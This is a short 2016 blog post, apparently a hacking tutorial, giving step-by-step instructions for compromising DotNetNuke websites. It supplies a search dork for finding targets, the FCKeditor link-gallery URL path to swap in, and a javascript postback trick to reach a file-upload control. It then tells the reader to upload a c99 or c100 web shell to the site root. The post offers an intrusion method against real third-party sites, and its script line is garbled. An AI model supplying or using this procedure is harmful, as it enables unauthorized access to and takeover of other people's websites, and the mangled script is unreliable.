Wednesday, May 25, 2016

website without sql injection,etc

Actually, I have named this trick: "P0rt@l H@ck!ng (DNN)"
Step 1: Go To-
2: Now enter this dork in srch box- :inurl:/tabid/36/ language/en-US/Default.aspx Note: The used to find vulnerable sites.. Use wisely..
Step 3: You will find many sites.. Select which you are comfortable..
Step 4: For example, if you take thir site- Step 5: Now replace : /Home/tabid/36/language/en-US/Default.aspx with this : /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Step 6: You will get a link gallery page... So far.. So good!Don't do anything...
Step 7: Now replace the URL in address bar with this simple script :
j-do Post Back ('ctlURL
$cmd Upload',")
Step 8: If the not work remove the spaces.... Then select root and upload page shell c99, c100..appr at webpage..

No comments:

Post a Comment